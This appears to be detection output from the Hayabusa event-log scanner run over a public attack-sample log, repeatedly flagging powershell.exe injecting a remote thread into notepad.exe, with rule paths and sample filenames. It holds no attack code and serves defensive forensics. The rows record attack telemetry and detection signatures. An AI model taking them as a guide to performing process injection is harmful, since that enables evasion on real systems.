Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.411 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.458 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.473 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.630 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.692 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.723 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.739 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.755 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
